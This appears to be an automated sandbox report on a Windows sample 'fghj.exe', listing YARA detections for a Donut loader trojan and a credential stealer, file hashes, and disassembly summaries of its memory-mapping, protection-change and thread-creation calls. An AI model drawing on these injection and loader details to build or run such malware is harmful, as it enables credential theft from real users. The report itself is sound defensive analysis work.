                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fiopw7y3N1XoJnyFf86CCrJIo6ZtFMm73qontuwZxYDdqY3fCNEH9Ivf9EQuFWFaZkXUvaexOq5Er3rWF4s2H2GkDBGQYmN%2FQyoKK1TC95pfsIIxZRqCXGPMAcgSCr0oU1k7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8ffc1792a8b0c32e-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1568&rtt_var=607&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1022&delivery_rate=1772920&cwnd=178&unsent_bytes=0&cid=bb49075a18683d89&ts=492&x=0"
                                                                                                                                                                                                                  2025-01-10 10:47:59 UTC54INData Raw: 33 30 0d 0a 6c 70 72 71 65 56 5a 2f 46 52 65 51 6c 39 74 52 38 34 64 5a 36 61 62 68 6e 61 69 79 2b 4f 4d 39 46 6e 61 66 47 6b 57 50 56 4c 62 4e 78 77 3d 3d 0d 0a
                                                                                                                                                                                                                  Data Ascii: 30lprqeVZ/FReQl9tR84dZ6abhnaiy+OM9FnafGkWPVLbNxw==
                                                                                                                                                                                                                  2025-01-10 10:47:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                  Start time:05:47:33
                                                                                                                                                                                                                  Start date:10/01/2025
                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\fghj.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\fghj.exe"
                                                                                                                                                                                                                  Imagebase:0x3a0000
                                                                                                                                                                                                                  File size:3'206'904 bytes
                                                                                                                                                                                                                  MD5 hash:549E550F48B48DE65C69C4E87BFFAA00
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1577594379.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1535009883.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1550688295.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1550688295.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1579195348.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1562333845.0000000000D32000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1565596801.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1535267597.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1562333845.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1579279388.0000000000D3A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1565596801.0000000000D8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1577594379.0000000000D33000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:1.4%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:92.3%
                                                                                                                                                                                                                    Signature Coverage:40%
                                                                                                                                                                                                                    Total number of Nodes:130
                                                                                                                                                                                                                    Total number of Limit Nodes:14
                                                                                                                                                                                                                    execution_graph 22496 3a899e 22497 3a895e 22496->22497 22498 3a8a9a VirtualAlloc 22497->22498 22499 3a8aad 22498->22499 22506 3a16ad GetProcessHeap HeapAlloc 22499->22506 22501 3a8df6 22507 3a180d GetProcessHeap HeapAlloc 22501->22507 22503 3a8e0e 22508 3a14af GetProcessHeap HeapAlloc 22503->22508 22505 3a8f1e 22506->22501 22507->22503 22508->22505 22509 b0038b 22510 b00399 22509->22510 22523 b00cdb 22510->22523 22512 b0081f 22513 b00531 GetPEB 22515 b005ae 22513->22515 22514 b004ec 22514->22512 22514->22513 22526 b00a9b 22515->22526 22518 b0060f CreateThread 22519 b005e7 22518->22519 22536 b0094b GetPEB 22518->22536 22519->22512 22534 b00f9b GetPEB 22519->22534 22521 b00a9b 4 API calls 22521->22512 22522 b00669 22522->22512 22522->22521 22524 b00ce8 22523->22524 22535 b00cfb GetPEB 22523->22535 22524->22514 22527 b00ab1 CreateToolhelp32Snapshot 22526->22527 22529 b005e1 22527->22529 22530 b00ae8 Thread32First 22527->22530 22529->22518 22529->22519 22531 b00ba4 CloseHandle 22530->22531 22533 b00b0f Thread32Next 22530->22533 22531->22529 22533->22531 22534->22522 22535->22524 22538 b009a4 22536->22538 22537 b00a51 22538->22537 22539 b00a04 CreateThread 22538->22539 22539->22538 22540 b0117b 22539->22540 22541 b01180 22540->22541 22543 b01188 22541->22543 22544 b01190 22543->22544 22546 b011ad 22544->22546 22547 b011b5 22546->22547 22547->22547 22550 b4af8d 22547->22550 22549 b011cd 22551 b4af97 22550->22551 22552 b4e483 22550->22552 22551->22549 22553 b4e4a7 22552->22553 22554 b4e591 22552->22554 22589 b50d04 22553->22589 22564 b4f75d 22554->22564 22557 b4e4bf 22558 b50d04 LoadLibraryA 22557->22558 22563 b4e537 22557->22563 22559 b4e501 22558->22559 22560 b50d04 LoadLibraryA 22559->22560 22561 b4e51d 22560->22561 22562 b50d04 LoadLibraryA 22561->22562 22562->22563 22563->22549 22565 b50d04 LoadLibraryA 22564->22565 22566 b4f780 22565->22566 22567 b50d04 LoadLibraryA 22566->22567 22568 b4f798 22567->22568 22569 b50d04 LoadLibraryA 22568->22569 22570 b4f7b6 22569->22570 22571 b4f7df 22570->22571 22572 b4f7cb VirtualAlloc 22570->22572 22571->22563 22572->22571 22574 b4f7f9 22572->22574 22573 b50d04 LoadLibraryA 22576 b4f877 22573->22576 22574->22573 22587 b4fa52 22574->22587 22575 b50d04 LoadLibraryA 22578 b4f8cd 22575->22578 22576->22571 22576->22578 22593 b50b0b 22576->22593 22577 b4f92f 22577->22587 22588 b4f991 22577->22588 22597 b4e8ed 22577->22597 22578->22575 22578->22577 22578->22587 22580 b4fb10 VirtualFree 22580->22571 22582 b4fb22 RtlExitUserProcess 22580->22582 22582->22571 22586 b4faaf 22586->22586 22587->22580 22587->22586 22588->22587 22620 b4fe8d 22588->22620 22590 b50d1b 22589->22590 22591 b50d42 22590->22591 22650 b4ee09 LoadLibraryA 22590->22650 22591->22557 22594 b50b20 22593->22594 22595 b50b96 LoadLibraryA 22594->22595 22596 b50ba0 22594->22596 22595->22596 22596->22576 22598 b50b0b LoadLibraryA 22597->22598 22599 b4e901 22598->22599 22602 b4e909 22599->22602 22644 b50ba9 22599->22644 22602->22587 22611 b4e9e8 22602->22611 22603 b4e93f VirtualProtect 22603->22602 22604 b4e953 22603->22604 22605 b4e96d VirtualProtect 22604->22605 22606 b50ba9 LoadLibraryA 22605->22606 22607 b4e98e 22606->22607 22607->22602 22608 b4e9a5 VirtualProtect 22607->22608 22608->22602 22609 b4e9b5 22608->22609 22610 b4e9ca VirtualProtect 22609->22610 22610->22602 22612 b50b0b LoadLibraryA 22611->22612 22613 b4e9fe 22612->22613 22614 b50ba9 LoadLibraryA 22613->22614 22615 b4ea0e 22614->22615 22616 b4ea17 VirtualProtect 22615->22616 22617 b4ea4b 22615->22617 22616->22617 22618 b4ea27 22616->22618 22617->22588 22619 b4ea36 VirtualProtect 22618->22619 22619->22617 22621 b4fec8 22620->22621 22622 b4ff0f NtCreateSection 22621->22622 22624 b4ff34 22621->22624 22643 b5053c 22621->22643 22622->22624 22622->22643 22623 b4ffc9 NtMapViewOfSection 22626 b4ffe9 22623->22626 22624->22623 22624->22643 22625 b50270 22627 b50312 VirtualAlloc 22625->22627 22630 b50b0b LoadLibraryA 22625->22630 22632 b5030e 22625->22632 22637 b50ba9 LoadLibraryA 22625->22637 22626->22625 22628 b50b0b LoadLibraryA 22626->22628 22634 b50ba9 LoadLibraryA 22626->22634 22626->22643 22629 b50354 22627->22629 22628->22626 22631 b50405 VirtualProtect 22629->22631 22641 b503f2 NtMapViewOfSection 22629->22641 22629->22643 22630->22625 22633 b504d0 VirtualProtect 22631->22633 22638 b50425 22631->22638 22632->22627 22636 b504ff 22633->22636 22634->22626 22635 b5064a 22639 b50652 CreateThread 22635->22639 22635->22643 22636->22635 22636->22643 22649 b508be LoadLibraryA 22636->22649 22637->22625 22638->22633 22642 b504aa VirtualProtect 22638->22642 22639->22643 22641->22631 22641->22643 22642->22638 22643->22587 22645 b50bc4 22644->22645 22647 b4e921 22644->22647 22645->22647 22648 b4efae LoadLibraryA 22645->22648 22647->22602 22647->22603 22648->22647 22649->22635 22650->22590

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 00B4FE8D Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00B4FF26
                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 00B4FFCE
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00B50342
                                                                                                                                                                                                                    • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 00B503F7
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 00B50414
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00B504B7
                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 00B504EA
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00B5065B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1248616170-0
                                                                                                                                                                                                                    • Opcode ID: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
                                                                                                                                                                                                                    • Instruction ID: 342e32875bbac63fd9b5cde7fa96ef4e5554f24239f3a6bcf4b3b9e6eee25946
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34e3949558d47ac2efbd442dc042839410f73323f736e1ca0bff09bbd7760ed0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5429B71618301AFDB24EF24C884B6BB7E8EF88715F1449ADFD859B251E770E848CB52
                                                                                                                                                                                                                    Function 003A6EB0 Relevance: 6.5, APIs: 3, Instructions: 2048librarymemoryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 187 3a6eb0-3a6eb7 188 3a6eb9 call 3a6a6e 187->188 189 3a6ebe-3a6ef6 call 3a1062 187->189 188->189 193 3a6efa-3a6f06 189->193 194 3a6ef8 189->194 195 3a6f0a-3a6f1c 193->195 196 3a6f08 193->196 194->193 197 3a6f1e 195->197 198 3a6f21-3a6f2d 195->198 196->195 197->198 199 3a6f2f 198->199 200 3a6f31-3a6f40 198->200 199->200 201 3a6f45-3a6f8c call 3a4591 call 3aaaa0 200->201 206 3a6f8e-3a6f91 201->206 207 3a6f96-3a6fa2 206->207 208 3a6faa-3a6fb0 207->208 209 3a6fa4 207->209 210 3a6fb8-3a6fcb 208->210 211 3a6fb2 208->211 209->208 210->207 212 3a6fcd-3a6fe1 210->212 211->210 213 3a6fe6-3a7009 212->213 214 3a700b 213->214 214->213 215 3a700d-3a7013 214->215 216 3a701b-3a7024 215->216 217 3a7015 215->217 219 3a6fd8-3a6fe1 216->219 220 3a7026 216->220 217->216 219->213 220->214 221 3a7028-3a7043 call 3a6257 220->221 224 3a7048-3a7083 call 3a52c2 221->224 228 3a7085-3a70ac 224->228
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 003A6A6E: FreeLibrary.KERNEL32(?,?,003A6EBE,?,00000000,003A2493,Advapi32.dll,?,?,00000000,003A2797,00000001), ref: 003A6A73
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressAllocFreeHandleLibraryModuleProcVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 207875923-0
                                                                                                                                                                                                                    • Opcode ID: c885bbb8134066eb2c9f57a40e236f24b4378e5334045258267fee2615f00c37
                                                                                                                                                                                                                    • Instruction ID: 45e9be412c445124f57bd924f9aad240eca53388c49457606189336df0a76533
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c885bbb8134066eb2c9f57a40e236f24b4378e5334045258267fee2615f00c37
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11E21377D103218FC74BEF79EC8756A376AFB93310B46862EE402DB166DF3855428A81
                                                                                                                                                                                                                    Function 003A6F23 Relevance: 6.5, APIs: 3, Instructions: 2019librarymemoryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 229 3a6f23-3a6f2d 230 3a6f2f 229->230 231 3a6f31-3a6f40 229->231 230->231 232 3a6f45-3a6f8c call 3a4591 call 3aaaa0 231->232 237 3a6f8e-3a6f91 232->237 238 3a6f96-3a6fa2 237->238 239 3a6faa-3a6fb0 238->239 240 3a6fa4 238->240 241 3a6fb8-3a6fcb 239->241 242 3a6fb2 239->242 240->239 241->238 243 3a6fcd-3a6fe1 241->243 242->241 244 3a6fe6-3a7009 243->244 245 3a700b 244->245 245->244 246 3a700d-3a7013 245->246 247 3a701b-3a7024 246->247 248 3a7015 246->248 250 3a6fd8-3a6fe1 247->250 251 3a7026 247->251 248->247 250->244 251->245 252 3a7028-3a7043 call 3a6257 251->252 255 3a7048-3a7083 call 3a52c2 252->255 259 3a7085-3a70ac 255->259
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3695083113-0
                                                                                                                                                                                                                    • Opcode ID: c7790a1db8d57cef4c04081c4c29b71810ed557408e7581176e612a6454795b1
                                                                                                                                                                                                                    • Instruction ID: 2119e4bcd88c0f3e694ff27bc6a84b9f43bb835dd4ac392bc3765f7719459c3d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c7790a1db8d57cef4c04081c4c29b71810ed557408e7581176e612a6454795b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4E21437D143218FD74BEF79EC8656A376AFB93310B46862EE402DB166DF3855028B81
                                                                                                                                                                                                                    Function 003A70D7 Relevance: 6.4, APIs: 3, Instructions: 1896librarymemoryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 260 3a70d7-3a70d9 261 3a70e0-3a7614 call 3a8f61 call 3a9e25 call 3a8f61 call 3a6208 call 3a8f61 call 3a2341 call 3a956c call 3a5a60 call 3a8f61 call 3a4a90 call 3a9e25 call 3a57ed call 3a8f61 call 3a9e25 call 3a19b6 call 3a6dd3 call 3a8f61 * 3 call 3a68ff call 3a4961 call 3a4724 call 3a3eaf call 3a8f61 call 3a1160 call 3a9e25 call 3a8f61 call 3a20f6 call 3a9937 call 3a8f61 call 3a319e call 3a5562 call 3a30f4 call 3a8f61 call 3a5e82 call 3a8f61 call 3a5301 call 3a2280 call 3a3eaf * 2 call 3a6dd3 call 3a3eaf call 3a8f61 call 3a50ae call 3a8f61 call 3a6696 call 3a30f4 call 3a6494 call 3a10fa call 3a4878 260->261 262 3a70db call 3a28cf 260->262 363 3a7619-3a88f0 call 3a5652 call 3a247a call 3a3eaf call 3a5d0f call 3a5b0a call 3a19b6 call 3a6a35 call 3a330f call 3a6494 call 3a3eaf call 3aa3fc call 3a5301 call 3a6dd3 call 3a3eaf call 3a4522 call 3a30f4 call 3a8f61 call 3a5397 call 3a8f61 call 3a1c56 call 3a57ed call 3a8f61 call 3a1aa8 call 3a48c2 call 3a4522 call 3a60f3 call 3a6b01 call 3a3eaf call 3a6dd3 call 3a939e call 3a4522 GetModuleHandleW call 3a5e82 call 3a4522 * 2 call 3a6494 call 3a8f61 * 3 call 3a5c9f call 3a330f call 3a2825 call 3a30f4 call 3a8f61 call 3a6696 call 3a2825 call 3a3eaf call 3a615c call 3a5a31 call 3a5397 call 3a54f1 call 3a6494 call 3a8f61 call 3a4bab call 3a8f61 * 2 call 3a956c call 3a9937 call 3a8f61 * 2 call 3a6dd3 call 3a9937 call 3a6a6d call 3a2b64 call 3a3eaf * 2 call 3a8f61 call 3a52c2 call 3a2825 call 3a939e call 3a30f4 call 3a3eaf call 3a19b6 call 3a2825 call 3a8f61 call 3a6696 call 3a6494 call 3a8f61 call 3a1c56 call 3a6dd3 * 2 call 3a30f4 call 3a52c2 call 3a9937 * 2 call 3a1478 call 3a49ca call 3a2b64 call 3a8f61 call 3a3eaf call 3a8f61 * 2 call 3a4bab call 3a505e call 3a500d call 3a4cef call 3aa3fc call 3a8f61 * 2 call 3a4522 call 3a9e25 call 3a3eaf call 3a49ca call 3a6dd3 call 3a4522 call 3a30f4 call 3a5722 call 3a8f61 call 3a4522 call 3a9c60 call 3a8f61 call 3aa3fc call 3a956c call 3a6b01 call 3a939e GetProcAddress call 3a500d call 3a5323 call 3a6dd3 call 3a1aa8 call 3a9700 call 3a25eb call 3a24b1 call 3a2b64 call 3a4522 call 3a8f61 call 3a4a15 call 3a1160 call 3a939e call 3a1cb8 call 3a9c60 call 3a45f3 call 3a8f61 call 3a40c8 call 3a5c9f call 3a5161 call 3a5c9f call 3a5722 call 3a8f61 * 2 call 3a41f1 call 3a421e call 3a20f6 call 3a30f4 call 3a6a35 call 3a5b0a call 3a8f61 call 3a30f4 call 3a102c call 3a6696 call 3a30f4 call 3a8f61 * 3 call 3a30f4 call 3a1478 call 3a15a7 call 3a41f1 call 3a8f61 * 2 call 3a565e call 3a8f61 call 3a19b6 call 3a500d 261->363 364 3a7614 call 3a4878 261->364 262->261 364->363
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00000000,00000000,00000000,?,?,003A4337,PrefixCommandLine,?,?,?,?,?,?,000001D0,000001D0), ref: 003A7A1F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3695083113-0
                                                                                                                                                                                                                    • Opcode ID: 29d7feaee6e1f11fb6191351d0b0df369689ccc556f18a29aaf7a80e7304ceeb
                                                                                                                                                                                                                    • Instruction ID: 58a3ec0f03cb5cf2562d99591bd6795aaa026c38f270a69a012089d80fe01f28
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29d7feaee6e1f11fb6191351d0b0df369689ccc556f18a29aaf7a80e7304ceeb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE203379143218FC74BEF79EC8756A376AFB93310B46862EE402DB166DF3855028A85
                                                                                                                                                                                                                    Function 00B00A9B Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 690 b00a9b-b00ae2 CreateToolhelp32Snapshot 693 b00bb8-b00bbb 690->693 694 b00ae8-b00b09 Thread32First 690->694 695 b00ba4-b00bb6 CloseHandle 694->695 696 b00b0f-b00b15 694->696 695->693 697 b00b84-b00b9e Thread32Next 696->697 698 b00b17-b00b1d 696->698 697->695 697->696 698->697 699 b00b1f-b00b3e 698->699 699->697 701 b00b40-b00b44 699->701 702 b00b46-b00b5a 701->702 703 b00b5c-b00b6b 701->703 705 b00b70-b00b7f 702->705 703->705 705->697
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00B005E1,?,00000001,?,81EC8B55,000000FF), ref: 00B00AD9
                                                                                                                                                                                                                    • Thread32First.KERNEL32(00000000,0000001C), ref: 00B00B05
                                                                                                                                                                                                                    • Thread32Next.KERNEL32(00000000,0000001C), ref: 00B00B9A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B00BB6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3643885135-0
                                                                                                                                                                                                                    • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                    • Instruction ID: 79fe530abb5b9754d2937e31bae27c0a0afe29f0feb715fbb01db23866daf663
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF411E71600109AFDB18DF98C490BADBBF6EF88304F1080A8E6159B7E4DB34AE41CB94
                                                                                                                                                                                                                    Function 003A7EFA Relevance: 4.0, APIs: 2, Instructions: 994librarymemoryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 003A8433
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,000512AA,-00000002CA091863,?,?,?,?,-00000001D962E44F,?,00000000), ref: 003A8A9D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
